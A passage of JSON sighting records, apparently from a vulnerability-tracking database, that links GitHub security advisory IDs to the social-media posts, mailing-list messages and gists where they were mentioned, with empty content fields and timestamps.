"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8cc4-rfj6-fhg4", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lnijr22bms2h", "content": "", "creation_timestamp": "2025-04-23T15:41:08.210929Z"}, {"uuid": "1f98bab8-0843-4306-8116-447fed3d8700", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h7hj-4j78-cvc7", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114388177097060487", "content": "", "creation_timestamp": "2025-04-23T16:17:46.124976Z"}, {"uuid": "8f34ec8e-edb3-4811-a121-11a26a19b2e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r67f-p999-2gff", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114388277180826920", "content": "", "creation_timestamp": "2025-04-23T16:43:13.307779Z"}, {"uuid": "a16f4b09-37f5-412e-a314-6ae2f1d89c3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f69v-xrj8-rhxf", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114388282485493837", "content": "", "creation_timestamp": "2025-04-23T16:44:34.192145Z"}, {"uuid": "53c3cb46-16d8-4ade-b531-72d46d1a0bde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgqp-3mmf-7h8f", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q2/273", "content": "", "creation_timestamp": "2025-06-23T23:32:45.000000Z"}, {"uuid": "c10a8584-b5fa-45d5-9fa9-2fcb78ce63d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/a168521ad40294d01d81aa227fbbd307", "content": "", "creation_timestamp": "2025-06-17T11:16:15.000000Z"}, {"uuid": "3f4a2518-a11b-4f79-99de-2aae8a0cfbbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/a168521ad40294d01d81aa227fbbd307", "content": "", "creation_timestamp": "2025-06-17T11:16:15.000000Z"}, {"uuid": "3b7f2610-e209-482d-8c82-3caf45198b5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gg5-vx3j-xwc7", "type": "seen", "source": "https://gist.github.com/safer-bot/a168521ad40294d01d81aa227fbbd307", "content": "", "creation_timestamp": "2025-06-17T11:16:15.000000Z"}, {"uuid": "f4812094-bac8-4694-83ab-9c402222999c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h4h5-3hr4-j3g2", "type": "seen", "source": "https://gist.github.com/safer-bot/a168521ad40294d01d81aa227fbbd307", "content": "", "creation_timestamp": "2025-06-17T11:16:15.000000Z"}, {"uuid": "37f28ab1-bb39-4c14-8f48-13152b44ab55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g5ww-5jh7-63cx", "type": "seen", "source": "https://gist.github.com/safer-bot/a168521ad40294d01d81aa227fbbd307", "content": "", "creation_timestamp": "2025-06-17T11:16:15.000000Z"}, {"uuid": "36b5282f-d230-49fd-b2a5-51b52ff887cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/a168521ad40294d01d81aa227fbbd307", "content": "", "creation_timestamp": "2025-06-17T11:16:15.000000Z"}, {"uuid": "1945238e-35af-4ffc-97dd-ccebf875a381", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4wp7-92pw-q264", "type": "seen", "source": "https://gist.github.com/safer-bot/055b6b45398d9684cc776425a3635970", "content": "", "creation_timestamp": "2025-07-16T07:46:12.000000Z"}, {"uuid": "e0f737e1-92eb-456e-80de-63b099de1243", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/24d871f5d5a1f1f569b4afc0326e41b9", "content": "", "creation_timestamp": "2025-07-16T12:14:34.000000Z"}, {"uuid": "6506efe4-dd98-4097-a2eb-fce1c5d58dee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhgr-952r-6p8q", "type": "seen", "source": "https://gist.github.com/safer-bot/24d871f5d5a1f1f569b4afc0326e41b9", "content": "", "creation_timestamp": "2025-07-16T12:14:34.000000Z"}, {"uuid": "b54e97bd-e66e-479a-8ad8-7e2c6fd48d83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/309b2c3514c96b866281e3349bccea4d", "content": "", "creation_timestamp": "2025-07-16T13:21:10.000000Z"}, {"uuid": "3282798a-399b-40a0-8ee0-1e4c2c9705d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pq2g-wx69-c263", "type": "seen", "source": "https://gist.github.com/safer-bot/309b2c3514c96b866281e3349bccea4d", "content": "", "creation_timestamp": "2025-07-16T13:21:10.000000Z"}, {"uuid": "be193d35-c42c-46e2-a06f-0393918d6f86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qx2m-rcpc-v43v", "type": "seen", "source": "https://bsky.app/profile/hnws.bsky.social/post/3lpegg44dal2f", "content": "", "creation_timestamp": "2025-05-17T11:21:04.445260Z"}, {"uuid": "b920a968-1673-4055-aca2-ae71c4f997f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/616a8b85e998ab57bb1c3128b073777f", "content": "", "creation_timestamp": "2025-07-16T07:47:33.000000Z"}, {"uuid": "7836a5e5-d3e1-4b45-9769-e933179b2b6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/616a8b85e998ab57bb1c3128b073777f", "content": "", "creation_timestamp": "2025-07-16T07:47:33.000000Z"}, {"uuid": "ccf540f8-26c3-4f18-b843-1247515c049a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qx2m-rcpc-v43v", "type": "seen", "source": "https://bsky.app/profile/hnbot.gsuscs.xyz/post/3lpeiluml7c2e", "content": "", "creation_timestamp": "2025-05-17T12:00:05.568172Z"}, {"uuid": "580c265e-d210-4643-82fd-a7c417b9c6fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-77h8-5j3h-jcjf", "type": "seen", "source": "https://gist.github.com/safer-bot/23b062fa31ac28ebdc739265e325ffe8", "content": "", "creation_timestamp": "2025-06-17T12:51:03.000000Z"}, {"uuid": "13fbe903-7bb2-46bb-bb16-afbe7d08278e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6c25-cxcc-pmc4", "type": "seen", "source": "https://gist.github.com/safer-bot/23b062fa31ac28ebdc739265e325ffe8", "content": "", "creation_timestamp": "2025-06-17T12:51:03.000000Z"}, {"uuid": "e775e5d0-4e21-409d-b2f3-ae824aabfdd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcrp-x7w3-ffmg", "type": "seen", "source": "https://gist.github.com/safer-bot/23b062fa31ac28ebdc739265e325ffe8", "content": "", "creation_timestamp": "2025-06-17T12:51:03.000000Z"}, {"uuid": "0a06f10e-1eb7-4129-a2e0-26000c36640e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qx2m-rcpc-v43v", "type": "seen", "source": "https://bsky.app/profile/hackernewstop5.bsky.social/post/3lpejsak72q2z", "content": "", "creation_timestamp": "2025-05-17T12:21:33.649122Z"}, {"uuid": "0d8343d6-ba50-4134-bdd0-11e2cd598617", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g8m5-722r-8whq", "type": "seen", "source": "https://gist.github.com/safer-bot/36bcd7e69e4c991c665db68dfffc1c7c", "content": "", "creation_timestamp": "2025-06-17T12:50:41.000000Z"}, {"uuid": "30018bbc-7636-426a-bc91-bb92ec5924f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4h8f-2wvx-gg5w", "type": "seen", "source": "https://gist.github.com/safer-bot/36bcd7e69e4c991c665db68dfffc1c7c", "content": "", "creation_timestamp": "2025-06-17T12:50:41.000000Z"}, {"uuid": "49a9af03-eacc-4ee9-88a9-4a6afe8188b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qh8g-58pp-2wxh", "type": "seen", "source": "https://gist.github.com/safer-bot/36bcd7e69e4c991c665db68dfffc1c7c", "content": "", "creation_timestamp": "2025-06-17T12:50:41.000000Z"}, {"uuid": "54d8e1f1-7eda-4547-95d6-6a3a31766d54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/36bcd7e69e4c991c665db68dfffc1c7c", "content": "", "creation_timestamp": "2025-06-17T12:50:41.000000Z"}, {"uuid": "cfb366ac-3cb8-4827-a37c-ff196e45f82a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/36bcd7e69e4c991c665db68dfffc1c7c", "content": "", "creation_timestamp": "2025-06-17T12:50:41.000000Z"}, {"uuid": "461a0ffb-d2a4-4e75-bbb6-e409133199ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m44j-cfrm-g8qc", "type": "seen", "source": "https://gist.github.com/safer-bot/36bcd7e69e4c991c665db68dfffc1c7c", "content": "", "creation_timestamp": "2025-06-17T12:50:41.000000Z"}, {"uuid": "61feb74a-acd5-47ce-bdc2-df3948eff2ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/36bcd7e69e4c991c665db68dfffc1c7c", "content": "", "creation_timestamp": "2025-06-17T12:50:41.000000Z"}, {"uuid": "7036ed80-1cea-432c-bb0c-6526fcd6f498", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/36bcd7e69e4c991c665db68dfffc1c7c", "content": "", "creation_timestamp": "2025-06-17T12:50:41.000000Z"}, {"uuid": "5d8950c1-c685-4a69-8ee8-46bb06b9bb2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/36bcd7e69e4c991c665db68dfffc1c7c", "content": "", "creation_timestamp": "2025-06-17T12:50:41.000000Z"}, {"uuid": "6fd66f47-3135-4a3b-bb6d-9d20a663b6fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/36bcd7e69e4c991c665db68dfffc1c7c", "content": "", "creation_timestamp": "2025-06-17T12:50:41.000000Z"}, {"uuid": "f9149eb1-9cf8-4d48-9bda-adbd00180b79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/74e21949896b589baa948e9ed6f5748a", "content": "", "creation_timestamp": "2025-06-17T12:51:43.000000Z"}, {"uuid": "f047dbfc-f0f1-48ef-8c58-e7c19c4fe7b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fx2c-96vj-985v", "type": "seen", "source": "https://gist.github.com/safer-bot/74e21949896b589baa948e9ed6f5748a", "content": "", "creation_timestamp": "2025-06-17T12:51:43.000000Z"}, {"uuid": "53d5be4d-77de-4788-aded-a5e4f02b8c64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6mjq-h674-j845", "type": "seen", "source": "https://gist.github.com/safer-bot/74e21949896b589baa948e9ed6f5748a", "content": "", "creation_timestamp": "2025-06-17T12:51:43.000000Z"}, {"uuid": "03a26ed3-c55d-44bd-ba07-2ee6beca27f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://gist.github.com/safer-bot/74e21949896b589baa948e9ed6f5748a", "content": "", "creation_timestamp": "2025-06-17T12:51:43.000000Z"}, {"uuid": "867867bf-597f-46da-81c0-c8544be29fea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xpw8-rcwv-8f8p", "type": "seen", "source": "https://gist.github.com/safer-bot/74e21949896b589baa948e9ed6f5748a", "content": "", "creation_timestamp": "2025-06-17T12:51:43.000000Z"}, {"uuid": "a138214f-e216-4dcb-9f01-885eb96c997a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8c-wm8x-jfhw", "type": "seen", "source": "https://gist.github.com/safer-bot/74e21949896b589baa948e9ed6f5748a", "content": "", "creation_timestamp": "2025-06-17T12:51:43.000000Z"}, {"uuid": "98b9127d-b5e1-4710-ab59-9235f3bbdcb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq3w-v528-46rv", "type": "seen", "source": "https://gist.github.com/safer-bot/74e21949896b589baa948e9ed6f5748a", "content": "", "creation_timestamp": "2025-06-17T12:51:43.000000Z"}, {"uuid": "f22ed4d3-af69-4405-9529-1c41b15ce99d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/cdefca8e2d68f42cbb27217c7d68be5d", "content": "", "creation_timestamp": "2025-07-16T11:59:17.000000Z"}, {"uuid": "b5bf09f9-987e-4dd6-a1ad-fc1b7577feae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/cdefca8e2d68f42cbb27217c7d68be5d", "content": "", "creation_timestamp": "2025-07-16T11:59:17.000000Z"}, {"uuid": "d07002bb-ca45-4f8f-ac8d-2be6fc7ae61b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gcxr-m95v-qcf7", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114633314018963839", "content": "", "creation_timestamp": "2025-06-05T23:19:18.717123Z"}, {"uuid": "2cd22621-0c0d-4f41-b8ee-6ed71ee471cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gcxr-m95v-qcf7", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3lqvhgj2xbl2i", "content": "", "creation_timestamp": "2025-06-05T23:19:39.059424Z"}, {"uuid": "96c0c3c7-f0f0-4d13-b8c2-460937dbb3c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgqp-3mmf-7h8f", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q2/273", "content": "", "creation_timestamp": "2025-06-23T23:32:45.000000Z"}, {"uuid": "e375a866-9bcf-4057-ab9c-b8dec5634c21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/d5ca115ca66735f27af739cec1454583", "content": "", "creation_timestamp": "2025-06-17T00:49:16.000000Z"}, {"uuid": "9042bf14-d2bd-49fd-9ba2-c20a73a7d356", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ghph-v4x4-vr3c", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114343058254160495", "content": "", "creation_timestamp": "2025-04-15T17:03:27.342217Z"}, {"uuid": "dda56262-ecc9-49b6-9358-c7261d1c57e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9v34-frgq-63mv", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114343062669368490", "content": "", "creation_timestamp": "2025-04-15T17:04:34.534959Z"}, {"uuid": "7a1c6164-bb1c-407e-96ac-bd87f342eb12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/d5ca115ca66735f27af739cec1454583", "content": "", "creation_timestamp": "2025-06-17T00:49:16.000000Z"}, {"uuid": "c0bf3636-6685-4589-81a4-3409513ad854", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qr9h-j6xg-2j72", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114824801590526083", "content": "", "creation_timestamp": "2025-07-09T18:57:07.245791Z"}, {"uuid": "91ebb639-850d-40e0-ae9f-974431b4eafb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/d9797f0aff4e030dd91427990bb06340", "content": "", "creation_timestamp": "2025-07-16T06:55:31.000000Z"}, {"uuid": "8a8c45fd-2dc4-4af6-8bdb-9783a558e604", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5v34-g2px-j4fw", "type": "seen", "source": "https://gist.github.com/safer-bot/d9797f0aff4e030dd91427990bb06340", "content": "", "creation_timestamp": "2025-07-16T06:55:31.000000Z"}, {"uuid": "363174cf-4c9e-4d92-8440-beeab1b0c154", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/d9797f0aff4e030dd91427990bb06340", "content": "", "creation_timestamp": "2025-07-16T06:55:31.000000Z"}, {"uuid": "d65cf031-74c0-46ac-b2e7-0f3fd0920a34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/f2d75feeb51240ee12628e5a45142eea", "content": "", "creation_timestamp": "2025-07-16T12:00:29.000000Z"}, {"uuid": "b706698f-12ac-4593-8e45-4f968b15f868", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/fb68192f1973b53b94f2ef663a1bfa44", "content": "", "creation_timestamp": "2025-07-16T13:12:34.000000Z"}, {"uuid": "7cbb363e-471a-4511-9057-bb5294b2f315", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/fb68192f1973b53b94f2ef663a1bfa44", "content": "", "creation_timestamp": "2025-07-16T13:12:34.000000Z"}, {"uuid": "de3f1ad6-88e5-4abd-b0a4-fba454bd4d2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/fb68192f1973b53b94f2ef663a1bfa44", "content": "", "creation_timestamp": "2025-07-16T13:12:34.000000Z"}, {"uuid": "71e16b60-a015-4b90-9951-3ff8ff68e1a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73m2-qfq3-56cx", "type": "seen", "source": "https://gist.github.com/safer-bot/fb68192f1973b53b94f2ef663a1bfa44", "content": "", "creation_timestamp": "2025-07-16T13:12:34.000000Z"}, {"uuid": "75a642ce-0959-42f7-a048-eeead449bb2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-WHXG-WX83-85P5", "type": "seen", "source": "https://t.me/brutsecurity/985", "content": "", "creation_timestamp": "2026-07-10T00:00:36.326994Z"}, {"uuid": "7d4ab3fe-11e2-4bc7-afe8-ac7f349ac088", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37cp-fgq5-7wc2", "type": "seen", "source": "https://bsky.app/profile/fd0.social.freebsd.amsterdam.ap.brid.gy/post/3lmzmmyonnzt2", "content": "", "creation_timestamp": "2025-04-17T17:27:07.967804Z"}, {"uuid": "9d8de18c-d666-446f-8915-685f5e773c21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37cp-fgq5-7wc2", "type": "seen", "source": "https://bsky.app/profile/timb-machine.infosec.exchange.ap.brid.gy/post/3ln2agyuru5t2", "content": "", "creation_timestamp": "2025-04-17T23:25:08.872743Z"}, {"uuid": "7f701ac6-b2a7-4d27-b0a7-6a85708f7903", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xqg6-5wfv-4855", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114857955667613596", "content": "", "creation_timestamp": "2025-07-15T15:28:38.503917Z"}, {"uuid": "07119cf8-ff7d-46e0-8967-ccc824f5ccab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q5r4-cfpx-h6fh", "type": "seen", "source": "https://gist.github.com/safer-bot/d9797f0aff4e030dd91427990bb06340", "content": "", "creation_timestamp": "2025-07-16T06:55:31.000000Z"}, {"uuid": "6d3d4d9e-c10b-41cf-b8ac-e3c027e34e21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4p6w-m9wc-c9c9", "type": "seen", "source": "https://gist.github.com/safer-bot/d9797f0aff4e030dd91427990bb06340", "content": "", "creation_timestamp": "2025-07-16T06:55:31.000000Z"}, {"uuid": "c22df45e-2d8e-4772-b9a6-986683063c6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/0290d5d4d8d0bde09196e370c1554b3d", "content": "", "creation_timestamp": "2025-07-16T12:02:17.000000Z"}, {"uuid": "725aebf3-5b21-49ee-ab01-e17018bc9bfc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/0290d5d4d8d0bde09196e370c1554b3d", "content": "", "creation_timestamp": "2025-07-16T12:02:17.000000Z"}, {"uuid": "5a507476-b966-40b1-b4f4-29aa3c61ffc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/0290d5d4d8d0bde09196e370c1554b3d", "content": "", "creation_timestamp": "2025-07-16T12:02:17.000000Z"}, {"uuid": "b030597d-afd4-4e26-898f-034262a37f29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rc2q-x9mf-w3vf", "type": "seen", "source": "https://gist.github.com/safer-bot/0290d5d4d8d0bde09196e370c1554b3d", "content": "", "creation_timestamp": "2025-07-16T12:02:17.000000Z"}, {"uuid": "440e2f4d-bebe-462d-859d-63cbbfc4afdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-889j-63jv-qhr8", "type": "seen", "source": "https://gist.github.com/safer-bot/fb68192f1973b53b94f2ef663a1bfa44", "content": "", "creation_timestamp": "2025-07-16T13:12:34.000000Z"}, {"uuid": "45d91303-bffc-4e4d-86ab-5fb9267e648a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rc2q-x9mf-w3vf", "type": "seen", "source": 